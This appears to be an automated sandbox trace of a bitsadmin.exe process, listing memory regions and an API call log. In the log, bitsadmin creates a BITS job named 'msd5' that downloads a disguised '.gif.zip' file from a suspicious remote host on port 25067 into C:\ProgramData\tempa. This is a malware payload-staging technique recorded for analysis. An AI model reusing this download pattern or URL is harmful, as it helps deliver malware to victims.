region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1563
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1564
start_va = 0x150000
end_va = 0x18ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1565
start_va = 0xc10000
end_va = 0xc53fff
entry_point = 0xc10000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1566
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1567
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1568
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1569
start_va = 0x7ffd3000
end_va = 0x7ffd3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd3000"
filename = ""
Region:
id = 1570
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1571
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1572
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1573
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1574
start_va = 0x190000
end_va = 0x257fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1575
start_va = 0x270000
end_va = 0x36ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 1576
start_va = 0x4e0000
end_va = 0x4effff
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 1577
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1578
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1579
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1580
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1581
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1582
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1583
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1584
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1585
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1586
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1587
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1588
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1589
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1590
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1591
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1592
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1593
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1594
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1595
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1596
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0xe0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1597
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1598
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1599
start_va = 0x370000
end_va = 0x470fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000370000"
filename = ""
Region:
id = 1600
start_va = 0xc60000
end_va = 0x185ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c60000"
filename = ""
Region:
id = 1601
start_va = 0x480000
end_va = 0x4dbfff
entry_point = 0x480000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1602
start_va = 0x480000
end_va = 0x4dbfff
entry_point = 0x480000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1603
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1604
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1605
start_va = 0x4f0000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 1606
start_va = 0x5d0000
end_va = 0x6aefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 1607
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1608
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1609
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1610
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 1611
start_va = 0x7f0000
end_va = 0x82ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 1612
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1613
start_va = 0x860000
end_va = 0x89ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 1614
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1615
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1616
start_va = 0x480000
end_va = 0x4bbfff
entry_point = 0x480000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1617
start_va = 0x480000
end_va = 0x4bbfff
entry_point = 0x480000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1618
start_va = 0x480000
end_va = 0x4bbfff
entry_point = 0x480000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1619
start_va = 0x480000
end_va = 0x4bbfff
entry_point = 0x480000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1620
start_va = 0x480000
end_va = 0x4bbfff
entry_point = 0x480000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1621
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1622
start_va = 0x8a0000
end_va = 0xb6efff
entry_point = 0x8a0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1623
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1624
start_va = 0x710000
end_va = 0x74ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000710000"
filename = ""
Region:
id = 1625
start_va = 0xb90000
end_va = 0xbcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 1626
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1627
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1628
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 153
os_tid = 0xc9c
[0070.381] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbc4 | out: lpSystemTimeAsFileTime=0x18fbc4*(dwLowDateTime=0xda909d90, dwHighDateTime=0x1d469c7))
[0070.381] GetCurrentProcessId () returned 0xc98
[0070.381] GetCurrentThreadId () returned 0xc9c
[0070.381] GetTickCount () returned 0x1f862
[0070.381] QueryPerformanceCounter (in: lpPerformanceCount=0x18fbbc | out: lpPerformanceCount=0x18fbbc*=1814432700000) returned 1
[0070.382] GetModuleHandleA (lpModuleName=0x0) returned 0xc10000
[0070.382] __set_app_type (_Type=0x1)
[0070.382] __p__fmode () returned 0x757a31f4
[0070.382] __p__commode () returned 0x757a31fc
[0070.382] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc37f33) returned 0x0
[0070.383] __wgetmainargs (in: _Argc=0xc50824, _Argv=0xc5082c, _Env=0xc50828, _DoWildCard=0, _StartInfo=0xc50838 | out: _Argc=0xc50824, _Argv=0xc5082c, _Env=0xc50828) returned 0
[0070.383] _onexit (_Func=0xc3925e) returned 0xc3925e
[0070.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0070.384] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0070.384] AitLogFeatureUsageByApp () returned 0x0
[0070.384] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0070.384] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0070.385] VerifyVersionInfoW (in: lpVersionInformation=0x18fa38, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x18fa38) returned 1
[0070.385] SetLastError (dwErrCode=0x0)
[0070.385] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0070.385] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0070.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0070.385] GetCurrentProcess () returned 0xffffffff
[0070.385] GetCurrentThread () returned 0xfffffffe
[0070.385] GetCurrentProcess () returned 0xffffffff
[0070.385] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xc3c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc3c3b0*=0x80) returned 1
[0070.385] SetConsoleCtrlHandler (HandlerRoutine=0xc274cb, Add=1) returned 1
[0070.385] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0070.385] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0070.385] SetThreadUILanguage (LangId=0x0) returned 0x409
[0070.386] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0070.387] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0070.387] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0070.387] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0070.388] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0070.388] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0070.388] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0070.388] swprintf_s (in: _Dst=0x18fb30, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0070.388] GetFileType (hFile=0x7) returned 0x2
[0070.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18faa4 | out: lpMode=0x18faa4) returned 1
[0070.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18fad4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18fad4*=0x2) returned 1
[0070.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x18fae0, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18fae0*=0x24) returned 1
[0070.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18fae4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18fae4*=0x1e) returned 1
[0070.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x18fae8, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18fae8*=0x29) returned 1
[0070.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18faec, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18faec*=0x2) returned 1
[0070.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x18faf0, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18faf0*=0x5e) returned 1
[0070.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x18faf4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18faf4*=0x58) returned 1
[0070.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18faf8, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18faf8*=0x2) returned 1
[0070.389] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0070.404] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0070.404] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x18fb44 | out: lpNumberOfEvents=0x18fb44) returned 1
[0070.404] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0070.404] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xc3c3a8 | out: lpMode=0xc3c3a8) returned 1
[0070.404] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xc3c390 | out: lpConsoleScreenBufferInfo=0xc3c390) returned 1
[0070.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xc3c38c | out: lpMode=0xc3c38c) returned 1
[0070.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0070.405] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0070.405] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0070.405] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0070.405] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0070.405] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0070.405] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0070.405] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0070.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0070.405] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0070.405] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0070.405] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0070.405] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0070.405] CoCreateInstance (in: rclsid=0xc265d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xc265b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xc3c3b4 | out: ppv=0xc3c3b4*=0x28a53c) returned 0x0
[0070.467] IBackgroundCopyManager:CreateJob (in: This=0x28a53c, DisplayName="msd5", Type=0x0, pJobId=0x18fb0c, ppJob=0x18fb08 | out: pJobId=0x18fb0c*(Data1=0x281ab0d9, Data2=0xeeae, Data3=0x48a1, Data4=([0]=0x96, [1]=0xe7, [2]=0xd2, [3]=0x1f, [4]=0xdd, [5]=0x93, [6]=0x78, [7]=0xc0)), ppJob=0x18fb08*=0x28a614) returned 0x0
[0070.474] CoTaskMemAlloc (cb=0x50) returned 0x299238
[0070.474] IUnknown:AddRef (This=0x28a614) returned 0x2
[0070.474] IUnknown:AddRef (This=0x28a614) returned 0x3
[0070.474] PeekMessageW (in: lpMsg=0x18fa84, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x18fa84) returned 0
[0070.474] IUnknown:Release (This=0x28a614) returned 0x2
[0070.474] IBackgroundCopyJob:SetPriority (This=0x28a614, Val=0x0) returned 0x0
[0070.478] IBackgroundCopyJob:AddFile (This=0x28a614, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif") returned 0x0
[0070.485] IBackgroundCopyJob:SetNotifyFlags (This=0x28a614, Val=0xb) returned 0x0
[0070.487] IBackgroundCopyJob:SetNotifyInterface (This=0x28a614, Val=0x299238) returned 0x0
[0070.487] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f588 | out: ppvObject=0x18f588*=0x0) returned 0x80004002
[0070.487] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f548 | out: ppvObject=0x18f548*=0x0) returned 0x80004002
[0070.488] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f530 | out: ppvObject=0x18f530*=0x0) returned 0x80004002
[0070.488] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f4e4 | out: ppvObject=0x18f4e4*=0x299238) returned 0x0
[0070.488] IUnknown:AddRef (This=0x299238) returned 0x3
[0070.488] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f444 | out: ppvObject=0x18f444*=0x0) returned 0x80004002
[0070.488] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2a0d54 | out: ppvObject=0x2a0d54*=0x0) returned 0x80004002
[0070.488] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x18f44c | out: ppvObject=0x18f44c*=0x0) returned 0x80004002
[0070.488] IUnknown:Release (This=0x299238) returned 0x2
[0070.490] IUnknown:QueryInterface (in: This=0x299238, riid=0x291610*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x18e94c | out: ppvObject=0x18e94c*=0x0) returned 0x80004002
[0070.491] IUnknown:QueryInterface (in: This=0x299238, riid=0x291610*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x18e94c | out: ppvObject=0x18e94c*=0x299238) returned 0x0
[0070.491] IUnknown:QueryInterface (in: This=0x299238, riid=0x291610*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x298320 | out: ppvObject=0x298320*=0x299238) returned 0x0
[0070.492] IBackgroundCopyJob:Resume (This=0x28a614) returned 0x0
[0070.496] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0070.496] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0070.496] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x18fa68 | out: lpMode=0x18fa68) returned 1
[0070.498] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0070.498] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x18faa8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0070.499] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 1
[0070.499] TranslateMessage (lpMsg=0x18fa80) returned 0
[0070.499] DispatchMessageW (lpMsg=0x18fa80) returned 0x1
[0070.499] IUnknown:QueryInterface (in: This=0x299238, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x18f5dc | out: ppvObject=0x18f5dc*=0x0) returned 0x80004002
[0070.499] IBackgroundCopyCallback:JobModification (This=0x299238, pJob=0x28a6a4, dwReserved=0x0) returned 0x0
[0070.499] IBackgroundCopyJob:GetState (in: This=0x28a614, pVal=0x299244 | out: pVal=0x299244) returned 0x0
[0070.500] IBackgroundCopyJob:GetType (in: This=0x28a614, pVal=0x18f148 | out: pVal=0x18f148) returned 0x0
[0070.501] IBackgroundCopyJob:GetProgress (in: This=0x28a614, pVal=0x299248 | out: pVal=0x299248) returned 0x0
[0070.502] IBackgroundCopyJob:GetPriority (in: This=0x28a614, pVal=0x18f144 | out: pVal=0x18f144) returned 0x0
[0070.502] CoTaskMemFree (pv=0x0)
[0070.502] IBackgroundCopyJob:GetDisplayName (in: This=0x28a614, pVal=0x18f15c | out: pVal=0x18f15c*="msd5") returned 0x0
[0070.503] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f104 | out: lpConsoleScreenBufferInfo=0x18f104) returned 1
[0070.503] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x18f11c | out: lpNumberOfCharsWritten=0x18f11c) returned 1
[0070.503] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x18f11c | out: lpNumberOfAttrsWritten=0x18f11c) returned 1
